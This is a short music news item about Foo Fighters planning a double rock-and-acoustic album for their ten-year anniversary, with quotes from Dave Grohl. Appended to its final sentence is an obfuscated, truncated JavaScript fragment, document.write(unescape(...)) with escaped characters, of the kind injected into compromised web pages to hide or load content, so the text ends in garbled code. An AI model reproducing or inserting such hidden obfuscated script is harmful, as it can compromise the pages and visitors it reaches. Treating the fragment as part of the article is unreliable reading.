Foo Fighters have revealed that they will be marking the band's ten year anniversary with a new double release. The band will split the album into two distinctive styles, rock and acoustic.
However, while the band have released songs in both styles before, the new songs will be pushing the genres to the extreme. Grohl told the BBC, "The good thing about doing it is that you split it up so that there's no middle ground. So the rock stuff is the most rocking stuff we've ever worked on, ever and the acoustic stuff will be the trippiest, most beautiful, sleepy music we've ever made, almost like a soundtrack.
The album is set for release in the summer, either in June or July, and the band are currently recording in a converted warehouse in Los Angeles.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
